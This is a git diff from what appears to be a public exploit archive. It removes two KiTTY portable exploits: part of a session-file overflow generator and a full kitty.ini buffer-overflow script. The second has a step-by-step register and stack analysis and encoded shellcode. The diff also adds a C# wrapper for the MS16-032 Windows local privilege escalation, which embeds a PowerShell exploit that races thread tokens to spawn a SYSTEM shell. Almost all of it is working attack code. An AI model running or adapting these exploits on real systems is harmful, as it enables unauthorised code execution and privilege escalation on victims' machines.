"RekeyBytes\\1G\\\r" -buffer += "RekeyTime\\60\\\r" -buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r" -buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r" -buffer += "ChangeUsername\\0\\\r" -buffer += "GssapiFwd\\0\\\r" -buffer += "AgentFwd\\0\\\r" -buffer += "TryAgent\\1\\\r" -buffer += "Compression\\0\\\r" -buffer += "NoPTY\\0\\\r" -buffer += "LocalUserName\\\\\r" -buffer += "UserNameFromEnvironment\\0\\\r" -buffer += "UserName\\\\\r" -buffer += "Environment\\\\\r" -buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r" -buffer += "ProxyPassword\\\\\r" -buffer += "ProxyUsername\\\\\r" -buffer += "ProxyPort\\80\\\r" -buffer += "ProxyHost\\proxy\\\r" -buffer += "ProxyMethod\\0\\\r" -buffer += "ProxyLocalhost\\0\\\r" -buffer += "ProxyDNS\\1\\\r" -buffer += "ProxyExcludeList\\\\\r" -buffer += "AddressFamily\\0\\\r" -buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r" -buffer += "TerminalSpeed\\38400,38400\\\r" -buffer += "TerminalType\\xterm\\\r" -buffer += "TCPKeepalives\\0\\\r" -buffer += "TCPNoDelay\\1\\\r" -buffer += "PingIntervalSecs\\0\\\r" -buffer += "PingInterval\\0\\\r" -buffer += "WarnOnClose\\1\\\r" -buffer += "CloseOnExit\\1\\\r" -buffer += "PortNumber\\22\\\r" -buffer += "Protocol\\ssh\\\r" -buffer += "SSHLogOmitData\\0\\\r" -buffer += "SSHLogOmitPasswords\\1\\\r" -buffer += "LogFlush\\1\\\r" -buffer += "LogFileClash\\-1\\\r" -buffer += "LogType\\0\\\r" -buffer += "LogFileName\\" + payload2 + "\\\r" # Shellcode -buffer += "HostName\\" + payload1 + "\\\r" # Egg Hunter -buffer += "Present\\1\\\r" -buffer += 
"LogHost\\\\\r"
-
-# Location of our evil session file (modify with your KiTTY directory)
-file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession"
-try:
- print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer))
- f = open(file,'w')
- f.write(buffer)
- f.close()
- print "[*] Done!"
-except:
- print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39122..py b/platforms/windows/local/39122..py
deleted file mode 100755
index bc167fb16..000000000
--- a/platforms/windows/local/39122..py
+++ /dev/null
@@ -1,263 +0,0 @@ -# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10) -# Date: 28/12/2015 -# Exploit Author: Guillaume Kaddouch -# Twitter: @gkweb76 -# Blog: http://networkfilter.blogspot.com -# GitHub: https://github.com/gkweb76/exploits -# Vendor Homepage: http://www.9bis.net/kitty/ -# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe -# Version: 0.65.0.2p -# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR) -# Category: Local - -""" -Disclosure Timeline: --------------------- -2015-09-18: Vulnerability discovered -2015-09-26: Vendor contacted -2015-09-28: Vendor answer -2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability -2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter -2015-11-15: KiTTY 0.66.6.1p released, seems fixed -2015-12-28: exploit published - -Description : -------------- -A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into -the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is -overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use -kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute -local executables on Windows 8.1 and Windows 10. - -Win8.1 -> Code Execution -Win10 -> Code Execution - -Instructions: -------------- -- Run exploit -- Launch KiTTY - -Exploitation: -------------- -As EDX register points to our buffer, it seems like using a return address pointing to a -JMP EDX instruction would do the trick. 
However this is not the case, because of the address containing -a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be -overwritten: - -EAX = 00000041 -00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX] -00533DA4 00 DB 00 - -Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash, -but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking -like a deadend, is in fact exploitable: - -ECX and EBX points to our buffer -EDX and EDI are overwritten by our buffer - -EDI = 41414141 -764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI] - -Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI -at offset 1048. We can write a valid memory address into EDI, allowing the program to continue -its execution. One such address is the address ESP points to on the stack: 0x0028C4F8. 
-Let's take a closer look to the code executed: - - -764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here -764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX] -764F8DBF 03D0 ADD EDX,EAX -764F8DC1 83F0 FF XOR EAX,FFFFFFFF -764F8DC4 33C2 XOR EAX,EDX -764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX] -764F8DC8 83C1 04 ADD ECX,4 -764F8DCB A9 00010181 TEST EAX,81010100 -764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9 - -764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE -764F8DD4 83C7 04 ADD EDI,4 -764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above - -1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address -2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF, -overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our -buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction -following this code: - -764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE -764F8DD4 83C7 04 ADD EDI,4 -764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 -764F8DD9 84D2 TEST DL,DL -764F8DDB 74 32 JE SHORT msvcrt.764F8E0F -764F8DDD 84F6 TEST DH,DH -764F8DDF 74 15 JE SHORT msvcrt.764F8DF6 -764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000 -764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF -764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX -764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] -764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0 -764F8DF4 5F POP EDI -764F8DF5 C3 RETN <------- We want that! - -This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction. -If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would -give us the control of the execution flow. 
- -When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP -has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-) - -However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no -crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end -of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and -take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI. - -1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL -2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there -for EDI -3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try -to make ESP pointing to it when the crash happens. - -After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time -of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make -EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. -As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'. 
- -To sume it up: -1) First crash with EIP overwritten seems not exploitable -2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers -3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack -4) The RET instruction is reached and execution crashes again -5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct -offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow. - -That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building, -who do all the work for us inside, and goes out back to us with the vault key (EIP). -""" - -import sys - -if len(sys.argv) == 1: - print "\nUsage: kitty_ini_8_10.py " - print "Example: kitty_ini_8_10.py win8.1" - sys.exit() - -os = sys.argv[1] # Windows version to target - -# Metasploit WinExec shellcode (calc.exe) -# Encoder: x86/alpha_mixed -# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31 -# Size: 448 bytes -shellcode = ( -"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" -"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" -"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" -"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c" -"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50" -"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74" -"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f" -"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b" -"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62" -"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e" -"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51" 
-"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30" -"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b" -"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64" -"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43" -"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51" -"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b" -"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e" -"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74" -"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79" -"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b" -"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47" -"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f" -"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30" -"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35" -"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42" -"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a" -"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42" -"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41" -) - -# Stack address where to copy our shellcode, with an offset of ESP - 1052 -if os == "win8.1": - edi = '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64 -elif os == "win10": - edi = '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64 -else: - print "Unknown OS chosen. Please choose 'win8.1' or 'win10'." 
- sys.exit() - -nops = '\x90' * 8 -padding = '\x41' * (1048 - len(nops) - len(shellcode)) - -payload = nops + shellcode + padding + edi - -# Kitty.ini configuration file -buffer ="[ConfigBox]\n" -buffer +="height=22\n" -buffer +="filter=yes\n" -buffer +="#default=yes\n" -buffer +="#noexit=no\n" -buffer +="[KiTTY]\n" -buffer +="backgroundimage=no\n" -buffer +="capslock=no\n" -buffer +="conf=yes\n" -buffer +="cygterm=yes\n" -buffer +="icon=no\n" -buffer +="#iconfile=\n" -buffer +="#numberoficons=45\n" -buffer +="paste=no\n" -buffer +="print=yes\n" -buffer +="scriptfilefilter=\n" -buffer +="size=no\n" -buffer +="shortcuts=yes\n" -buffer +="mouseshortcuts=yes\n" -buffer +="hyperlink=no\n" -buffer +="transparency=no\n" -buffer +="#configdir=\n" -buffer +="#downloaddir=\n" -buffer +="#uploaddir=\n" -buffer +="remotedir=\n" -buffer +="#PSCPPath=\n" -buffer +="#PlinkPath=\n" -buffer +="#WinSCPPath=\n" -buffer +="#CtHelperPath=\n" -buffer +="#antiidle== \k08\\\n" -buffer +="#antiidledelay=60\n" -buffer +="sshversion=\n" -buffer +="#WinSCPProtocol=sftp\n" -buffer +="#autostoresshkey=no\n" -buffer +="#UserPassSSHNoSave=no\n" -buffer +="KiClassName=" + payload + "\n" -buffer +="#ReconnectDelay=5\n" -buffer +="savemode=dir\n" -buffer +="bcdelay=0\n" -buffer +="commanddelay=5\n" -buffer +="initdelay=2.0\n" -buffer +="internaldelay=10\n" -buffer +="slidedelay=0\n" -buffer +="wintitle=yes\n" -buffer +="zmodem=yes\n" -buffer +="[Print]\n" -buffer +="height=100\n" -buffer +="maxline=60\n" -buffer +="maxchar=85\n" -buffer +="[Folder]\n" -buffer +="[Launcher]\n" -buffer +="reload=yes\n" -buffer +="[Shortcuts]\n" -buffer +="print={SHIFT}{F7}\n" -buffer +="printall={F7}\n" - -# Kitty.ini file location (modify according to your installation path) -file = "C:\\kitty\\App\\KiTTY\\kitty.ini" -try: - print "[*] Writing to %s (%s bytes)" % (file, len(buffer)) - f = open(file,'w') - f.write(buffer) - f.close() - print "[*] Done!" 
-except:
- print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39809..cs
new file mode 100755
index 000000000..4b2822c50
--- /dev/null
+++ b/platforms/windows/local/39809..cs
@@ -0,0 +1,51 @@
+# Exploit Title: Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
+# Date: 2016-04-25
+# Author: @fdiskyou
+# e-mail: rui at deniable.org
+# Original exploit: https://www.exploit-db.com/exploits/39719/
+# All credits go to @FuzzySec
+# C# version with @FuzzySec powershell code which does not rely on powershell.exe. Instead it runs from a powershell runspace environment (.NET). Helpful in security restricted environments with GPO, SRP, App Locker.
+# To compile MS16-032 you need to import this project within Microsoft Visual Studio or if you don't have access to a Visual Studio installation, you can compile with csc.exe.
+# It uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
+# CVE: 2016-0099
+
+using System;
+using System.IO;
+using System.Collections.Generic;
+using System.Collections.ObjectModel;
+using System.Text;
+using System.Threading.Tasks;
+using System.Management.Automation;
+using System.Management.Automation.Host;
+using System.Management.Automation.Runspaces;
+
+namespace MS16_032
+{
+ class Program
+ {
+ static void Main()
+ {
+ PowerShellExecutor t = new PowerShellExecutor();
+ t.ExecuteSynchronously();
+ }
+ }
+
+ class PowerShellExecutor
+ {
+ public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"function Invoke-MS16-032 {
<#
.SYNOPSIS
    
    PowerShell implementation of MS16-032. The exploit targets all vulnerable
    operating systems that support PowerShell v2+. Credit for the discovery of
    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
    
    Targets:
    
    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
    * Tested on x32 Win7, x64 Win8, x64 2k12R2
    
    Notes:
    
    * In order for the race condition to succeed the machine must have 2+ CPU
      cores. If testing in a VM just make sure to add a core if needed mkay.
    * The exploit is pretty reliable, however ~1/6 times it will say it succeeded
      but not spawn a shell. Not sure what the issue is but just re-run and profit!
    * Want to know more about MS16-032 ==>
      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

.DESCRIPTION
	Author: Ruben Boonen (@FuzzySec)
	Blog: http://www.fuzzysecurity.com/
	License: BSD 3-Clause
	Required Dependencies: PowerShell v2+
	Optional Dependencies: None
    
.EXAMPLE
	C:\PS> Invoke-MS16-032
#>
	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess;
		public IntPtr hThread;
		public int dwProcessId;
		public int dwThreadId;
	}
	
	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
	public struct STARTUPINFO
	{
		public Int32 cb;
		public string lpReserved;
		public string lpDesktop;
		public string lpTitle;
		public Int32 dwX;
		public Int32 dwY;
		public Int32 dwXSize;
		public Int32 dwYSize;
		public Int32 dwXCountChars;
		public Int32 dwYCountChars;
		public Int32 dwFillAttribute;
		public Int32 dwFlags;
		public Int16 wShowWindow;
		public Int16 cbReserved2;
		public IntPtr lpReserved2;
		public IntPtr hStdInput;
		public IntPtr hStdOutput;
		public IntPtr hStdError;
	}
	
	[StructLayout(LayoutKind.Sequential)]
	public struct SQOS
	{
		public int Length;
		public int ImpersonationLevel;
		public int ContextTrackingMode;
		public bool EffectiveOnly;
	}
	
	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
		public static extern bool CreateProcessWithLogonW(
			String userName,
			String domain,
			String password,
			int logonFlags,
			String applicationName,
			String commandLine,
			int creationFlags,
			int environment,
			String currentDirectory,
			ref  STARTUPINFO startupInfo,
			out PROCESS_INFORMATION processInformation);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool SetThreadToken(
			ref IntPtr Thread,
			IntPtr Token);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenThreadToken(
			IntPtr ThreadHandle,
			int DesiredAccess,
			bool OpenAsSelf,
			out IntPtr TokenHandle);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle, 
			int DesiredAccess,
			ref IntPtr TokenHandle);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public extern static bool DuplicateToken(
			IntPtr ExistingTokenHandle,
			int SECURITY_IMPERSONATION_LEVEL,
			ref IntPtr DuplicateTokenHandle);
	}
	
	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern IntPtr GetCurrentProcess();
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern IntPtr GetCurrentThread();
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern int GetThreadId(IntPtr hThread);
		
		[DllImport("kernel32.dll", SetLastError = true)]
		public static extern int GetProcessIdOfThread(IntPtr handle);
		
		[DllImport("kernel32.dll",SetLastError=true)]
		public static extern int SuspendThread(IntPtr hThread);
		
		[DllImport("kernel32.dll",SetLastError=true)]
		public static extern int ResumeThread(IntPtr hThread);
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool TerminateProcess(
			IntPtr hProcess,
			uint uExitCode);
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool CloseHandle(IntPtr hObject);
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool DuplicateHandle(
			IntPtr hSourceProcessHandle,
			IntPtr hSourceHandle,
			IntPtr hTargetProcessHandle,
			ref IntPtr lpTargetHandle,
			int dwDesiredAccess,
			bool bInheritHandle,
			int dwOptions);
	}
	
	public static class Ntdll
	{
		[DllImport("ntdll.dll", SetLastError=true)]
		public static extern int NtImpersonateThread(
			IntPtr ThreadHandle,
			IntPtr ThreadToImpersonate,
			ref SQOS SecurityQualityOfService);
	}
"@
	
	function Get-ThreadHandle {
		# StartupInfo Struct
		$StartupInfo = New-Object STARTUPINFO
		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
		
		# ProcessInfo Struct
		$ProcessInfo = New-Object PROCESS_INFORMATION
		
		# CreateProcessWithLogonW --> lpCurrentDirectory
		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
		
		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, "C:\Windows\System32\cmd.exe", "",
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)
		
		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
		$lpTargetHandle = [IntPtr]::Zero
		$CallResult = [Kernel32]::DuplicateHandle(
			$ProcessInfo.hProcess, 0x4,
			[Kernel32]::GetCurrentProcess(),
			[ref]$lpTargetHandle, 0, $false,
			0x00000002)
		
		# Clean up suspended process
		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
		
		$lpTargetHandle
	}
	
	function Get-SystemToken {
		echo "`n[?] Trying thread handle: $Thread"
		echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
	
		$CallResult = [Kernel32]::SuspendThread($Thread)
		if ($CallResult -ne 0) {
			echo "[!] $Thread is a bad thread, moving on.."
			Return
		} echo "[+] Thread suspended"
		
		echo "[>] Wiping current impersonation token"
		$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
		if (!$CallResult) {
			echo "[!] SetThreadToken failed, moving on.."
			$CallResult = [Kernel32]::ResumeThread($Thread)
			echo "[+] Thread resumed!"
			Return
		}
		
		echo "[>] Building SYSTEM impersonation token"
		# SecurityQualityOfService struct
		$SQOS = New-Object SQOS
		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
		# Undocumented API's, I like your style Microsoft ;)
		$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
		if ($CallResult -ne 0) {
			echo "[!] NtImpersonateThread failed, moving on.."
			$CallResult = [Kernel32]::ResumeThread($Thread)
			echo "[+] Thread resumed!"
			Return
		}
	
		$script:SysTokenHandle = [IntPtr]::Zero
		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
		$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
		if (!$CallResult) {
			echo "[!] OpenThreadToken failed, moving on.."
			$CallResult = [Kernel32]::ResumeThread($Thread)
			echo "[+] Thread resumed!"
			Return
		}
		
		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
		echo "[+] Resuming thread.."
		$CallResult = [Kernel32]::ResumeThread($Thread)
	}
	
	# main() <--- ;)
	$ms16032 = @"
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]
"@
	
	$ms16032
	
	# Check logical processor count, race condition requires 2+
	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
	if ($([System.Environment]::ProcessorCount) -lt 2) {
		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
		Return
	}
	
	# Create array for Threads & TID's
	$ThreadArray = @()
	$TidArray = @()
	
	echo "[>] Duplicating CreateProcessWithLogonW handles.."
	# Loop Get-ThreadHandle and collect thread handles with a valid TID
	for ($i=0; $i -lt 500; $i++) {
		$hThread = Get-ThreadHandle
		$hThreadID = [Kernel32]::GetThreadId($hThread)
		# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
		if ($TidArray -notcontains $hThreadID) {
			$TidArray += $hThreadID
			if ($hThread -ne 0) {
				$ThreadArray += $hThread # This is what we need!
			}
		}
	}
	
	if ($($ThreadArray.length) -eq 0) {
		echo "[!] No valid thread handles were captured, exiting!"
		Return
	} else {
		echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
		echo "`n[?] Thread handle list:"
		$ThreadArray
	}
	
	echo "`n[*] Sniffing out privileged impersonation token.."
	foreach ($Thread in $ThreadArray){
	
		# Get handle to SYSTEM access token
		Get-SystemToken
		
		echo "`n[*] Sniffing out SYSTEM shell.."
		echo "`n[>] Duplicating SYSTEM token"
		$hDuplicateTokenHandle = [IntPtr]::Zero
		$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
		
		# Simple PS runspace definition
		echo "[>] Starting token race"
		$Runspace = [runspacefactory]::CreateRunspace()
		$StartTokenRace = [powershell]::Create()
		$StartTokenRace.runspace = $Runspace
		$Runspace.Open()
		[void]$StartTokenRace.AddScript({
			Param ($Thread, $hDuplicateTokenHandle)
			while ($true) {
				$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
			}
		}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
		$AscObj = $StartTokenRace.BeginInvoke()
		
		echo "[>] Starting process race"
		# Adding a timeout (10 seconds) here to safeguard from edge-cases
		$SafeGuard = [diagnostics.stopwatch]::StartNew()
		while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
		# StartupInfo Struct
		$StartupInfo = New-Object STARTUPINFO
		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
		
		# ProcessInfo Struct
		$ProcessInfo = New-Object PROCESS_INFORMATION
		
		# CreateProcessWithLogonW --> lpCurrentDirectory
		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
		
		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, "C:\Windows\System32\cmd.exe", "",
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)
			
		$hTokenHandle = [IntPtr]::Zero
		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
		# If we can't open the process token it's a SYSTEM shell!
		if (!$CallResult) {
			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
			$StartTokenRace.Stop()
			$SafeGuard.Stop()
			Return
		}
			
		# Clean up suspended process
		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
		}
		
		# Kill runspace & stopwatch if edge-case
		$StartTokenRace.Stop()
		$SafeGuard.Stop()
	}
}")); + + public void ExecuteSynchronously() + { + InitialSessionState iss = InitialSessionState.CreateDefault(); + Runspace rs = RunspaceFactory.CreateRunspace(iss); + rs.Open(); + PowerShell ps = PowerShell.Create(); + ps.Runspace = rs; + ps.AddScript(PSInvoke_MS16_032); + ps.AddScript("Invoke-MS16-032"); + ps.AddCommand("Out-Default"); + ps.Invoke(); + rs.Close(); + } + } +} \ No newline at end of file diff --git a/platforms/windows/remote/39119..py b/platforms/windows/remote/39119..py deleted file mode 100755 index c4c3c674d..000000000 --- a/platforms/windows/remote/39119..py +++ /dev/null 
